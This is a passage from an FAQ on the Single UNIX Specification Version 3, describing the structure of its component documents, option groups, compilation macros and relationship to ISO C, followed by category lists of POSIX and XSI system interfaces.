Chapter 2 defines the conformance requirements, both for implementation and application conformance. For implementation conformance, this includes documentation requirements, conformance definitions for the core POSIX subset, conformance definitions for systems conforming to the Single UNIX Specification (denoted as the XSI extension), and option groups (previously known as feature groups).
|
||||
|
||||
Chapter 3 contains the general terms and definitions that apply throughout the Base Specifications.
|
||||
|
||||
Chapter 4 describes general concepts that apply throughout the Base Specifications.
|
||||
|
||||
Chapter 5 describes the notation used to specify file input and output formats in XBD and XCU.
|
||||
|
||||
Chapter 6 describes the portable character set and the process of character set definition.
|
||||
|
||||
Chapter 7 describes the syntax for defining internationalization locales as well as the POSIX locale provided on all systems.
|
||||
|
||||
Chapter 8 describes the use of environment variables for internationalization and other purposes.
|
||||
|
||||
Chapter 9 describes the syntax of pattern matching using regular expressions employed by many utilities and matched by the regcomp() and regexec() functions. Both Basic Regular Expressions (BREs) and Extended Regular Expressions (EREs) are described in this chapter.
|
||||
|
||||
Chapter 10 describes files and devices found on all systems and their semantics. For example, the device /dev/null is an empty data source and an infinite data sink: reads from it return end-of-file, and data written to it is discarded.
|
||||
|
||||
Chapter 11 describes the asynchronous terminal interface for many of the functions in XSH and the stty utility in XCU.
|
||||
|
||||
Chapter 12 describes the policies for command line argument construction and parsing. It contains the utility argument syntax used throughout XCU, and also utility syntax guidelines for naming of utilities and the specification of their arguments and option-arguments and operands.
|
||||
|
||||
Chapter 13 defines the contents of headers which declare constants, macros, and data structures that are needed by programs using the services provided by the system interfaces defined in XSH. These are in the form of reference pages and are organized alphabetically.
|
||||
|
||||
Q8. What is covered in the System Interfaces Technical Standard (XSH)?
|
||||
|
||||
The XSH document is part of the Base Specifications, Issue 6. XSH describes a set of system interfaces offered to application programs by systems conformant to this part of the Single UNIX Specification. Readers are expected to be experienced C language programmers, and to be familiar with the XBD document.
|
||||
|
||||
This document is structured as follows:
|
||||
|
||||
Chapter 1 explains the status of this document and its relationship to other formal standards. The scope, conformance, and definitions sections are pointers to the XBD document; the sections are here to meet ISO/IEC rules regarding required sections. The terminology and portability codes are identical to the section in XBD and repeated here for ease of reference.
|
||||
|
||||
Chapter 2 contains important concepts, terms, and caveats relating to the rest of this document. This includes information on the compilation environment, the name space, definitions of error numbers, signal concepts, standard I/O streams, STREAMS, XSI IPC, realtime, threads, sockets, tracing, and data types.
|
||||
|
||||
Chapter 3 defines the functional interfaces to systems conformant to this part of the Single UNIX Specification. These are in the form of reference pages and are organized alphabetically.
|
||||
|
||||
Q9. What is covered in the Shell and Utilities Technical Standard (XCU)?
|
||||
|
||||
The XCU[1] document is part of the Base Specifications, Issue 6. XCU describes the shell and utilities that are available to application programs on systems conformant to this part of the Single UNIX Specification. Readers are expected to be familiar with the XBD document.
|
||||
|
||||
This document is structured as follows:
|
||||
|
||||
Chapter 1 explains the status of this document and its relationship to other formal standards, including the ISO C standard and also the XSH document. It also describes the utility limits, grammar conventions, defaults used by the utility descriptions, considerations for utilities in support of large files, and the list of required built-in utilities. The scope, conformance, and definitions sections are pointers to the XBD document; the sections are here to meet ISO/IEC rules regarding required sections. The terminology and portability codes are identical to the section in XBD and repeated here for ease of reference.
|
||||
|
||||
Chapter 2 describes the command language (that is, the shell command language interpreter) used in systems conformant to the Single UNIX Specification.
|
||||
|
||||
Chapter 3 describes a set of services and utilities that are implemented on systems supporting the Batch Environment option.
|
||||
|
||||
Chapter 4 consists of reference pages for all utilities available on systems conforming to the Single UNIX Specification. These are in the form of reference pages and are organized alphabetically.
|
||||
|
||||
Footnote
|
||||
|
||||
1.
|
||||
The acronym "XCU" derives from the previous version of the specification, which was called "Commands and Utilities".
|
||||
|
||||
Q10. What is covered in the Rationale Technical Standard (XRAT)?
|
||||
|
||||
The XRAT document is part of the Base Specifications, Issue 6. The XRAT document has been published to assist in the process of review and understanding of the main text. It contains historical information concerning the contents of the Base Specifications, Issue 6 and why features were included or discarded by the standard developers. It also contains notes of interest to application programmers on recommended programming practices, emphasizing the consequences of some aspects that may not be immediately apparent.
|
||||
|
||||
This document is organized in parallel to the normative documents of the Base Specification, with a separate part (Parts A, B, and C) for each of the three normative documents. In addition, two additional parts are included: Part D, Portability Considerations and Part E Subprofiling Considerations. The Portability Considerations chapter includes a report on the perceived user requirements for the Base Specification and how the facilities provided satisfy those requirements, together with guidance to writers of profiles on how to use the configurable options, limits, and optional behavior. The Subprofiling Considerations chapter satisfies the requirement that the document address subprofiling. This contains an example set of subprofiling options.
|
||||
Q11. What is covered in the X/Open Curses Specification (XCURSES)?
|
||||
|
||||
XCURSES is not part of the Base Specifications, Issue 6. XCURSES describes a set of interfaces providing a terminal-independent method of updating character screens that are available to application programs on systems conformant to this part of the Single UNIX Specification. This document should be read in conjunction with The Open Group Corrigendum U056.
|
||||
|
||||
This document is structured as follows:
|
||||
|
||||
Chapter 1 introduces Curses, gives an overview of enhancements that have been made to this version, and lists specific interfaces marked TO BE WITHDRAWN. This chapter also defines the requirements for conformance to this document and shows the generic format followed by interface definitions in Chapter 4.
|
||||
|
||||
Chapter 2 describes the relationship between Curses and the C language, the compilation environment, and the X/Open System Interface (XSI) operating system requirements. It also defines the effect of the interface on the name space for identifiers and introduces the major data types that the interfaces use.
|
||||
|
||||
Chapter 3 gives an overview of Curses. It discusses the use of some of the key data types and gives general rules for important common concepts such as characters, renditions, and window properties. It contains general rules for the common Curses operations and operating modes. This information is implicitly referenced by the interface definitions in Chapter 4. The chapter explains the system of naming the Curses functions and presents a table of function families. Finally, the chapter contains notes regarding use of macros and restrictions on block-mode terminals.
|
||||
|
||||
Chapter 4 defines the Curses functional interfaces.
|
||||
|
||||
Chapter 5 defines the contents of headers which declare constants, macros, and data structures that are needed by programs using the services provided by Chapter 4.
|
||||
|
||||
Chapter 6 discusses the terminfo database which Curses uses to describe terminals. The chapter specifies the source format of a terminfo entry using a formal grammar, an informal discussion, and an example. Boolean, numeric, and string capabilities are presented in tabular form.
|
||||
|
||||
Appendix A discusses the use of these capabilities by the writer of a terminfo entry to describe the characteristics of the terminal in use.
|
||||
|
||||
The chapters are followed by a glossary, which contains normative definitions of terms used in the document.
|
||||
|
||||
Q12. How many APIs are there? Is there a list of APIs?
|
||||
|
||||
There are 1742 APIs, broken down as follows: XSH 1123, XCU 160, XBD 84 and XCURSES 375.
|
||||
|
||||
A list of APIs is available at http://www.unix-systems.org/version3/apis.html.
|
||||
|
||||
Q13. What Options are there in the Version 3 Specification?
|
||||
|
||||
The Version 3 Specification includes a set of profiling options, allowing larger profiles of the options of the Base standard. In earlier versions of the Single UNIX Specification these were formerly known as Feature Groups. The Option Groups within the Single UNIX Specification are defined within XBD, Section 2.1.5.2, XSI Option Groups.
|
||||
|
||||
The Single UNIX Specification Version 3 contains the following Option Groups:
|
||||
|
||||
Encryption, covering the functions crypt(), encrypt(), and setkey().
|
||||
Realtime, covering the functions from the IEEE Std 1003.1b-1993 Realtime extension.
|
||||
Realtime Threads, covering the functions from the IEEE Std 1003.1c-1995 Threads extension that are related to realtime functionality.
|
||||
Advanced Realtime, covering some of the non-threads-related functions from IEEE Std 1003.1d-1999 and IEEE Std 1003.1j-2000.
|
||||
Advanced Realtime Threads, covering some of the threads-related functions from IEEE Std 1003.1d-1999 and IEEE Std 1003.1j-2000.
|
||||
Tracing, covering the functionality from IEEE Std 1003.1q-2000.
|
||||
XSI STREAMS, covering the functionality and interfaces related to STREAMS, a uniform mechanism for implementing networking services and other character-based I/O as described in XSH, Section 2.6, STREAMS. This was mandatory in previous versions of the Single UNIX Specification, but is now optional in this version.
|
||||
Legacy, covering the functionality and interfaces which were mandatory in previous versions of the Single UNIX Specification, but are optional in this version.
|
||||
|
||||
Q14. What are the required directories and devices?
|
||||
|
||||
The Single UNIX Specification describes an applications portability environment, and as such defines a certain minimal set of directories and devices that applications regularly use.
|
||||
|
||||
The following directories are defined:
|
||||
|
||||
/ The root directory of the file system.
|
||||
/dev Contains the devices /dev/console, /dev/null, and /dev/tty.
|
||||
/tmp A directory where applications can create temporary files.
|
||||
|
||||
The directory structure does not cross into such system management issues as where user accounts are organized or software packages are installed. Refer to XBD, Section 10.1, Directory Structure and Files for more information. XBD, Chapter 10, Directory Structure and Devices also defines the mapping of control character sequences to real character values, and describes the actions an implementation must take when it cannot support certain terminal behavior.
|
||||
|
||||
Q15. What regular expressions are supported?
|
||||
|
||||
Both Basic Regular Expressions (BREs) and Extended Regular Expressions (EREs) are supported. They are described in XBD, Chapter 9, Regular Expressions, and all of the utilities and interfaces that use regular expressions refer back to this definition.
|
||||
|
||||
Basic regular expressions: csplit, ctags, ed, ex, expr, grep, more, nl, pax, pg, sed, vi
|
||||
|
||||
Extended regular expressions: awk, egrep, grep -E, lex
|
||||
|
||||
The functions regcomp() and regexec() in XSH, Chapter 3, System Interfaces implement regular expressions as defined in the Single UNIX Specification.
|
||||
|
||||
Q16. How should I compile a conforming program?
|
||||
|
||||
XCU defines c99 as the interface to the C compilation environment. The c99 interface is new to this version of the specification and an interface to the standard C compiler. The c89 and cc utilities are no longer defined in this version of the Single UNIX Specification although implementations may additionally support them for backwards-compatibility.
|
||||
|
||||
There are a number of tasks that must be done to effectively make the interface environment available to a program. A number of C-language macros, referred to as feature test macros, must be defined before any headers are included. These macros might more accurately be referred to as header configuration macros, as they control what symbols and prototypes will be exposed by the headers. The macro _XOPEN_SOURCE must be defined to a value of 600 to make available the functionality of the Single UNIX Specification, Version 3. With respect to POSIX functionality covered by the Single UNIX Specification, this is equivalent to defining the POSIX macro {_POSIX_C_SOURCE} to be 200112L.
|
||||
|
||||
Use of the {_XOPEN_SOURCE} macro should not be confused with the other feature test macros associated with Feature Groups and functionality, such as {_XOPEN_UNIX}. These feature test macros are the implementation's way of announcing functionality to the application.
|
||||
|
||||
Q17. What is the Relationship to the ISO C Standard?
|
||||
|
||||
The most recent revision to the ISO C standard occurred in 1999. The ISO C standard is itself independent of any operating system inasmuch as it may be implemented in many environments, including hosted environments.
|
||||
|
||||
The Single UNIX Specification has a long history of building on the ISO C standard and deferring to it where applicable. Revisions of POSIX.1 prior to the Austin Group specification built upon the ISO C standard by reference only, and also allowed support for traditional C as an alternative. The Single UNIX Specification, in contrast, has always included manual pages for the ISO C interfaces.
|
||||
|
||||
The Version 3 Specification takes the latter approach. The standard developers believed it essential for a programmer to have a single complete reference place. They also recognized that deference to the formal standard had to be addressed for the duplicate interface definitions which occur in both the ISO C standard and their document.
|
||||
|
||||
It was agreed that where an interface has a version in the ISO C standard, the DESCRIPTION section should describe the relationship to the ISO C standard and markings added as appropriate within the manual page to show where the ISO C standard has been extended.
|
||||
|
||||
A block of text was added to the start of each affected reference page stating whether the page is aligned with the ISO C standard or extended. Each page was parsed for additions beyond the ISO C standard and these extensions are marked as CX extensions (for C Extensions).
|
||||
|
||||
Q18. What happened to the Networking Services Specification (XNS)?
|
||||
|
||||
Unlike previous versions of the Single UNIX Specification, for Version 3 the Networking Services have now been integrated into the Base Specifications. This includes sockets and IP address resolution interfaces. The X/Open Transport Interface (XTI) is no longer a requirement in Version 3 of the Single UNIX Specification. As with other functions in XSH, the application developer needs to define {_XOPEN_SOURCE} to be 600 prior to the inclusion of any Single UNIX Specification headers. The c99 compiler utilities recognize the additional -l operand for the xnet library.
|
||||
|
||||
Q19. What System Interfaces are included by Category?
|
||||
|
||||
The system interfaces in the Version 3 specification categorized by functional grouping are as follows:
|
||||
|
||||
Jump Interfaces
|
||||
|
||||
longjmp(), setjmp()
|
||||
|
||||
Maths Library Interfaces
|
||||
|
||||
acos(), acosf(), acosh(), acoshf(), acoshl(), acosl(), asin(), asinf(), asinh(), asinhf(), asinhl(), asinl(), atan(), atan2(), atan2f(), atan2l(), atanf(), atanh(), atanhf(), atanhl(), atanl(), cabs(), cabsf(), cabsl(), cacos(), cacosf(), cacosh(), cacoshf(), cacoshl(), cacosl(), carg(), cargf(), cargl(), casin(), casinf(), casinh(), casinhf(), casinhl(), casinl(), catan(), catanf(), catanh(), catanhf(), catanhl(), catanl(), cbrt(), cbrtf(), cbrtl(), ccos(), ccosf(), ccosh(), ccoshf(), ccoshl(), ccosl(), ceil(), ceilf(), ceill(), cexp(), cexpf(), cexpl(), cimag(), cimagf(), cimagl(), clog(), clogf(), clogl(), conj(), conjf(), conjl(), copysign(), copysignf(), copysignl(), cos(), cosf(), cosh(), coshf(), coshl(), cosl(), cpow(), cpowf(), cpowl(), cproj(), cprojf(), cprojl(), creal(), crealf(), creall(), csin(), csinf(), csinh(), csinhf(), csinhl(), csinl(), csqrt(), csqrtf(), csqrtl(), ctan(), ctanf(), ctanh(), ctanhf(), ctanhl(), ctanl(), erf(), erfc(), erfcf(), erfcl(), erff(), erfl(), exp(), exp2(), exp2f(), exp2l(), expf(), expl(), expm1(), expm1f(), expm1l(), fabs(), fabsf(), fabsl(), fdim(), fdimf(), fdiml(), floor(), floorf(), floorl(), fma(), fmaf(), fmal(), fmax(), fmaxf(), fmaxl(), fmin(), fminf(), fminl(), fmod(), fmodf(), fmodl(), fpclassify(), frexp(), frexpf(), frexpl(), hypot(), hypotf(), hypotl(), ilogb(), ilogbf(), ilogbl(), isfinite(), isgreater(), isgreaterequal(), isinf(), isless(), islessequal(), islessgreater(), isnan(), isnormal(), isunordered(), ldexp(), ldexpf(), ldexpl(), lgamma(), lgammaf(), lgammal(), llrint(), llrintf(), llrintl(), llround(), llroundf(), llroundl(), log(), log10(), log10f(), log10l(), log1p(), log1pf(), log1pl(), log2(), log2f(), log2l(), logb(), logbf(), logbl(), logf(), logl(), lrint(), lrintf(), lrintl(), lround(), lroundf(), lroundl(), modf(), modff(), modfl(), nan(), nanf(), nanl(), nearbyint(), nearbyintf(), nearbyintl(), nextafter(), nextafterf(), nextafterl(), nexttoward(), nexttowardf(), nexttowardl(), pow(), 
powf(), powl(), remainder(), remainderf(), remainderl(), remquo(), remquof(), remquol(), rint(), rintf(), rintl(), round(), roundf(), roundl(), scalbln(), scalblnf(), scalblnl(), scalbn(), scalbnf(), scalbnl(), signbit(), sin(), sinf(), sinh(), sinhf(), sinhl(), sinl(), sqrt(), sqrtf(), sqrtl(), tan(), tanf(), tanh(), tanhf(), tanhl(), tanl(), tgamma(), tgammaf(), tgammal(), trunc(), truncf(), truncl()
|
||||
|
||||
General ISO C Library Interfaces
|
||||
|
||||
abs(), asctime(), atof(), atoi(), atol(), atoll(), bsearch(), calloc(), ctime(), difftime(), div(), feclearexcept(), fegetenv(), fegetexceptflag(), fegetround(), feholdexcept(), feraiseexcept(), fesetenv(), fesetexceptflag(), fesetround(), fetestexcept(), feupdateenv(), free(), gmtime(), imaxabs(), imaxdiv(), isalnum(), isalpha(), isblank(), iscntrl(), isdigit(), isgraph(), islower(), isprint(), ispunct(), isspace(), isupper(), isxdigit(), labs(), ldiv(), llabs(), lldiv(), localeconv(), localtime(), malloc(), memchr(), memcmp(), memcpy(), memmove(), memset(), mktime(), qsort(), rand(), realloc(), setlocale(), snprintf(), sprintf(), srand(), sscanf(), strcat(), strchr(), strcmp(), strcoll(), strcpy(), strcspn(), strerror(), strftime(), strlen(), strncat(), strncmp(), strncpy(), strpbrk(), strrchr(), strspn(), strstr(), strtod(), strtof(), strtoimax(), strtok(), strtol(), strtold(), strtoll(), strtoul(), strtoull(), strtoumax(), strxfrm(), time(), tolower(), toupper(), tzname, tzset(), va_arg(), va_copy(), va_end(), va_start(), vsnprintf(), vsprintf(), vsscanf()
|
||||
|
||||
Thread-Safe General ISO C Library Interfaces
|
||||
|
||||
asctime_r(), ctime_r(), gmtime_r(), localtime_r(), rand_r(), strerror_r(), strtok_r()
|
||||
|
||||
Wide-Character ISO C Library Interfaces
|
||||
|
||||
btowc(), iswalnum(), iswalpha(), iswblank(), iswcntrl(), iswctype(), iswdigit(), iswgraph(), iswlower(), iswprint(), iswpunct(), iswspace(), iswupper(), iswxdigit(), mblen(), mbrlen(), mbrtowc(), mbsinit(), mbsrtowcs(), mbstowcs(), mbtowc(), swprintf(), swscanf(), towctrans(), towlower(), towupper(), vswprintf(), vswscanf(), wcrtomb(), wcscat(), wcschr(), wcscmp(), wcscoll(), wcscpy(), wcscspn(), wcsftime(), wcslen(), wcsncat(), wcsncmp(), wcsncpy(), wcspbrk(), wcsrchr(), wcsrtombs(), wcsspn(), wcsstr(), wcstod(), wcstof(), wcstoimax(), wcstok(), wcstol(), wcstold(), wcstoll(), wcstombs(), wcstoul(), wcstoull(), wcstoumax(), wcsxfrm(), wctob(), wctomb(), wctrans(), wctype(), wmemchr(), wmemcmp(), wmemcpy(), wmemmove(), wmemset()
|
||||
|
||||
General C Library Extension Interfaces
|
||||
|
||||
fnmatch(), getopt(), optarg, opterr, optind, optopt
|
||||
|
||||
Device Input and Output Interfaces
|
||||
|
||||
FD_CLR(), FD_ISSET(), FD_SET(), FD_ZERO(), clearerr(), close(), fclose(), fdopen(), feof(), ferror(), fflush(), fgetc(), fgets(), fileno(), fopen(), fprintf(), fputc(), fputs(), fread(), freopen(), fscanf(), fwrite(), getc(), getchar(), gets(), open(), perror(), printf(), pselect(), putc(), putchar(), puts(), read(), scanf(), select(), setbuf(), setvbuf(), stderr, stdin, stdout, ungetc(), vfprintf(), vfscanf(), vprintf(), vscanf(), write()
|
||||
|
||||
General Terminal Interfaces
|
||||
|
||||
cfgetispeed(), cfgetospeed(), cfsetispeed(), cfsetospeed(), ctermid(), isatty(), tcdrain(), tcflow(), tcflush(), tcgetattr(), tcsendbreak(), tcsetattr(), ttyname()
|
||||
|
||||
Thread-Safe General Terminal Interfaces
|
||||
|
||||
ttyname_r()
|
||||
|
||||
File Descriptor Management Interfaces
|
||||
|
||||
dup(), dup2(), fcntl(), fgetpos(), fseek(), fseeko(), fsetpos(), ftell(), ftello(), ftruncate(), lseek(), rewind()
|
||||
|
||||
FIFO Interfaces
|
||||
|
||||
mkfifo()
|
||||
|
||||
File Attributes Interfaces
|
||||
|
||||
chmod(), chown(), fchmod(), fchown(), umask()
|
||||
|
||||
Thread-Safe Stdio Locking Interfaces
|
||||
|
||||
flockfile(), ftrylockfile(), funlockfile(), getc_unlocked(), getchar_unlocked(), putc_unlocked(), putchar_unlocked()
|
||||
|
||||
File System Interfaces
|
||||
|
||||
access(), chdir(), closedir(), creat(), fpathconf(), fstat(), getcwd(), link(), mkdir(), opendir(), pathconf(), readdir(), remove(), rename(), rewinddir(), rmdir(), stat(), tmpfile(), tmpnam(), unlink(), utime()
|
||||
|
||||
File System Extensions Interfaces
|
||||
|
||||
glob(), globfree()
|
||||
|
||||
Thread-Safe File System Interfaces
|
||||
|
||||
readdir_r()
|
||||
|
||||
Job Control Interfaces
|
||||
|
||||
setpgid(), tcgetpgrp(), tcsetpgrp()
|
||||
|
||||
Multiple Processes Interfaces
|
||||
|
||||
_Exit(), _exit(), assert(), atexit(), clock(), execl(), execle(), execlp(), execv(), execve(), execvp(), exit(), fork(), getpgrp(), getpid(), getppid(), setsid(), sleep(), times(), wait(), waitpid()
|
||||
|
||||
Networking Interfaces
|
||||
|
||||
accept(), bind(), connect(), endhostent(), endnetent(), endprotoent(), endservent(), freeaddrinfo(), gai_strerror(), getaddrinfo(), gethostbyaddr(), gethostbyname(), gethostent(), gethostname(), getnameinfo(), getnetbyaddr(), getnetbyname(), getnetent(), getpeername(), getprotobyname(), getprotobynumber(), getprotoent(), getservbyname(), getservbyport(), getservent(), getsockname(), getsockopt(), h_errno, htonl(), htons(), if_freenameindex(), if_indextoname(), if_nameindex(), if_nametoindex(), inet_addr(), inet_ntoa(), inet_ntop(), inet_pton(), listen(), ntohl(), ntohs(), recv(), recvfrom(), recvmsg(), send(), sendmsg(), sendto(), sethostent(), setnetent(), setprotoent(), setservent(), setsockopt(), shutdown(), socket(), sockatmark(), socketpair()
|
||||
|
||||
Pipe Interfaces
|
||||
|
||||
pipe()
|
||||
|
||||
Regular Expressions Interfaces
|
||||
|
||||
regcomp(), regerror(), regexec(), regfree()
|
||||
|
||||
Shell and Utilities Interfaces
|
||||
|
||||
pclose(), popen(), system(), wordexp(), wordfree()
|
||||
|
||||
Signal Interfaces
|
||||
|
||||
abort(), alarm(), kill(), pause(), raise(), sigaction(), sigaddset(), sigdelset(), sigemptyset(), sigfillset(), sigismember(), signal(), sigpending(), sigprocmask(), sigsuspend(), sigwait()
|
||||
|
||||
Signal Jump Functions Interfaces
|
||||
|
||||
siglongjmp(), sigsetjmp()
|
||||
|
||||
Single Process Interfaces
|
||||
|
||||
confstr(), environ, errno, getenv(), setenv(), sysconf(), uname(), unsetenv()
|
||||
|
||||
Symbolic Links Interfaces
|
||||
|
||||
lstat(), readlink(), symlink()
|
||||
|
||||
System Database Interfaces
|
||||
|
||||
getgrgid(), getgrnam(), getpwnam(), getpwuid()
|
||||
|
||||
Thread-Safe System Database Interfaces
|
||||
|
||||
getgrgid_r(), getgrnam_r(), getpwnam_r(), getpwuid_r()
|
||||
|
||||
Threads Interfaces
|
||||
|
||||
pthread_attr_setstacksize(), pthread_atfork(), pthread_attr_destroy(), pthread_attr_getdetachstate(), pthread_attr_getstackaddr(), pthread_attr_getstacksize(), pthread_attr_init(), pthread_attr_setdetachstate(), pthread_attr_setschedparam(), pthread_attr_setstackaddr(), pthread_barrierattr_destroy(), pthread_barrierattr_getpshared(), pthread_barrierattr_init(), pthread_barrierattr_setpshared(), pthread_barrier_destroy(), pthread_barrier_init(), pthread_barrier_wait(), pthread_cancel(), pthread_cleanup_pop(), pthread_cleanup_push(), pthread_cond_broadcast(), pthread_cond_destroy(), pthread_cond_init(), pthread_cond_signal(), pthread_cond_timedwait(), pthread_cond_wait(), pthread_condattr_destroy(), pthread_condattr_getpshared(), pthread_condattr_init(), pthread_condattr_setpshared(), pthread_create(), pthread_detach(), pthread_equal(), pthread_exit(), pthread_getschedparam(), pthread_getspecific(), pthread_join(), pthread_key_create(), pthread_key_delete(), pthread_kill(), pthread_mutex_destroy(), pthread_mutex_init(), pthread_mutex_lock(), pthread_mutex_timedlock(), pthread_mutex_trylock(), pthread_mutex_unlock(), pthread_mutexattr_destroy(), pthread_mutexattr_getpshared(), pthread_mutexattr_init(), pthread_mutexattr_setpshared(), pthread_once(), pthread_rwlockattr_destroy(), pthread_rwlockattr_getpshared(), pthread_rwlockattr_init(), pthread_rwlockattr_setpshared(), pthread_rwlock_destroy(), pthread_rwlock_init(), pthread_rwlock_rdlock(), pthread_rwlock_timedrdlock(), pthread_rwlock_timedwrlock(), pthread_rwlock_tryrdlock(), pthread_rwlock_trywrlock(), pthread_rwlock_unlock(), pthread_rwlock_wrlock(), pthread_self(), pthread_setcancelstate(), pthread_setcanceltype(), pthread_setspecific(), pthread_sigmask(), pthread_spin_destroy(), pthread_spin_init(), pthread_spin_lock(), pthread_spin_trylock(), pthread_spin_unlock(), pthread_testcancel()
|
||||
|
||||
Realtime Threads Interfaces
|
||||
|
||||
pthread_attr_getinheritsched(), pthread_attr_getschedpolicy(), pthread_attr_getscope(), pthread_attr_setinheritsched(), pthread_attr_setschedpolicy(), pthread_attr_setscope(), pthread_getschedparam(), pthread_mutex_getprioceiling(), pthread_mutex_setprioceiling(), pthread_mutexattr_getprioceiling(), pthread_mutexattr_getprotocol(), pthread_mutexattr_setprioceiling(), pthread_mutexattr_setprotocol(), pthread_setschedparam()
|
||||
|
||||
Realtime Interfaces
|
||||
|
||||
aio_cancel(), aio_error(), aio_fsync(), aio_read(), aio_return(), aio_suspend(), aio_write(), clock_getres(), clock_gettime(), clock_settime(), fdatasync(), lio_listio(), mlock(), mlockall(), mq_close(), mq_getattr(), mq_notify(), mq_open(), mq_receive(), mq_send(), mq_setattr(), mq_timedreceive(), mq_timedsend(), mq_unlink(), munlock(), munlockall(), nanosleep(), sched_get_priority_max(), sched_get_priority_min(), sched_getparam(), sched_getscheduler(), sched_rr_get_interval(), sched_setparam(), sched_setscheduler(), sched_yield(), sem_close(), sem_destroy(), sem_getvalue(), sem_init(), sem_open(), sem_post(), sem_timedwait(), sem_trywait(), sem_unlink(), sem_wait(), shm_open(), shm_unlink(), sigqueue(), sigtimedwait(), sigwaitinfo(), timer_create(), timer_delete(), timer_getoverrun(), timer_gettime(), timer_settime()
|
||||
|
||||
Tracing Interfaces
|
||||
|
||||
posix_trace_attr_destroy(), posix_trace_attr_getclockres(), posix_trace_attr_getcreatetime(), posix_trace_attr_getgenversion(), posix_trace_attr_getinherited(), posix_trace_attr_getlogfullpolicy(), posix_trace_attr_getlogsize(), posix_trace_attr_getmaxdatasize(), posix_trace_attr_getmaxsystemeventsize(), posix_trace_attr_getmaxusereventsize(), posix_trace_attr_getname(), posix_trace_attr_getstreamfullpolicy(), posix_trace_attr_getstreamsize(), posix_trace_attr_init(), posix_trace_attr_setinherited(), posix_trace_attr_setlogfullpolicy(), posix_trace_attr_setlogsize(), posix_trace_attr_setmaxdatasize(), posix_trace_attr_setname(), posix_trace_attr_setstreamfullpolicy(), posix_trace_attr_setstreamsize(), posix_trace_clear(), posix_trace_close(), posix_trace_create(), posix_trace_create_withlog(), posix_trace_event(), posix_trace_eventid_equal(), posix_trace_eventid_get_name(), posix_trace_eventid_open(), posix_trace_eventset_add(), posix_trace_eventset_del(), posix_trace_eventset_empty(), posix_trace_eventset_fill(), posix_trace_eventset_ismember(), posix_trace_eventtypelist_getnext_id(), posix_trace_eventtypelist_rewind(), posix_trace_flush(), posix_trace_get_attr(), posix_trace_get_filter(), posix_trace_getnext_event(), posix_trace_get_status(), posix_trace_open(), posix_trace_rewind(), posix_trace_set_filter(), posix_trace_shutdown(), posix_trace_start(), posix_trace_stop(), posix_trace_timedgetnext_event(), posix_trace_trid_eventid_open(), posix_trace_trygetnext_event()
|
||||
|
||||
Advisory Information Interfaces
|
||||
|
||||
posix_fadvise(), posix_fallocate(), posix_madvise()
|
||||
|
||||
Typed Memory Interfaces
|
||||
|
||||
posix_mem_offset(), posix_typed_mem_get_info(), posix_typed_mem_open()
|
||||
|
||||
User and Group Interfaces
|
||||
|
||||
getegid(), geteuid(), getgid(), getgroups(), getlogin(), getuid(), setegid(), seteuid(), setgid(), setuid()
|
||||
|
||||
Thread-Safe User and Group Interfaces
|
||||
|
||||
getlogin_r()
|
||||
|
||||
Wide Character Device Input and Output Interfaces
|
||||
|
||||
fgetwc(), fgetws(), fputwc(), fputws(), fwide(), fwprintf(), fwscanf(), getwc(), getwchar(), putwc(), putwchar(), ungetwc(), vfwprintf(), vfwscanf(), vwprintf(), vwscanf(), wprintf(), wscanf()
|
||||
|
||||
XSI General C Library Interfaces
|
||||
|
||||
_tolower(), _toupper(), a64l(), daylight, drand48(), erand48(), ffs(), getcontext(), getdate(), getsubopt(), hcreate(), hdestroy(), hsearch(), iconv(), iconv_close(), iconv_open(), initstate(), insque(), isascii(), jrand48(), l64a(), lcong48(), lfind(), lrand48(), lsearch(), makecontext(), memccpy(), mrand48(), nrand48(), random(), remque(), seed48(), setcontext(), setstate(), signgam, srand48(), srandom(), strcasecmp(), strdup(), strfmon(), strncasecmp(), strptime(), swab(), swapcontext(), tdelete(), tfind(), timezone, toascii(), tsearch(), twalk()
|
||||
|
||||
XSI Encryption Interfaces
|
||||
|
||||
crypt(), encrypt(), setkey()
|
||||
|
||||
XSI Database Management Interfaces
|
||||
|
||||
dbm_clearerr(), dbm_close(), dbm_delete(), dbm_error(), dbm_fetch(), dbm_firstkey(), dbm_nextkey(), dbm_open(), dbm_store()
|
||||
|
||||
XSI Device Input and Output Interfaces
|
||||
|
||||
fmtmsg(), poll(), pread(), pwrite(), readv(), writev()
|
||||
|
||||
XSI General Terminal Interfaces
|
||||
|
||||
grantpt(), posix_openpt(), ptsname(), unlockpt()
|
||||
|
||||
XSI Dynamic Linking Interfaces
|
||||
|
||||
dlclose(), dlerror(), dlopen(), dlsym()
|
||||
|
||||
XSI File Descriptor Management Interfaces
|
||||
|
||||
truncate()
|
||||
|
||||
XSI File System Interfaces
|
||||
|
||||
basename(), dirname(), fchdir(), fstatvfs(), ftw(), lchown(), lockf(), mknod(), mkstemp(), nftw(), realpath(), seekdir(), statvfs(), sync(), telldir(), tempnam()
|
||||
|
||||
XSI Internationalization Interfaces
|
||||
|
||||
catclose(), catgets(), catopen(), nl_langinfo()
|
||||
|
||||
XSI Interprocess Communication Interfaces
|
||||
|
||||
ftok(), msgctl(), msgget(), msgrcv(), msgsnd(), semctl(), semget(), semop(), shmat(), shmctl(), shmdt(), shmget()
|
||||
|
||||
XSI Job Control Interfaces
|
||||
|
||||
tcgetsid()
|
||||
|
||||
XSI Jump Functions Interfaces
|
||||
|
||||
_longjmp(), _setjmp()
|
||||
|
||||
XSI Maths Library Interfaces
|
||||
|
||||
j0(), j1(), jn(), scalb(), y0(), y1(), yn()
|
||||
|
||||
XSI Multiple Process Interfaces
|
||||
|
||||
getpgid(), getpriority(), getrlimit(), getrusage(), getsid(), nice(), setpgrp(), setpriority(), setrlimit(), ulimit(), usleep(), vfork(), waitid()
|
||||
|
||||
XSI Signal Interfaces
|
||||
|
||||
bsd_signal(), killpg(), sigaltstack(), sighold(), sigignore(), siginterrupt(), sigpause(), sigrelse(), sigset(), ualarm()
|
||||
|
||||
XSI Single Process Interfaces
|
||||
|
||||
gethostid(), gettimeofday(), putenv()
|
||||
|
||||
XSI System Database Interfaces
|
||||
|
||||
endpwent(), getpwent(), setpwent()
|
||||
|
||||
XSI System Logging Interfaces
|
||||
|
||||
closelog(), openlog(), setlogmask(), syslog()
|
||||
|
||||
XSI Thread Mutex Extensions Interfaces
|
||||
|
||||
pthread_mutexattr_gettype(), pthread_mutexattr_settype()
|
||||
|
||||
XSI Threads Extensions Interfaces
|
||||
|
||||
pthread_attr_getguardsize(), pthread_attr_setguardsize(), pthread_getconcurrency(), pthread_setconcurrency()
|
||||
|
||||
XSI Timers Interfaces
|
||||
|
||||
getitimer(), setitimer()
|
||||
|
||||
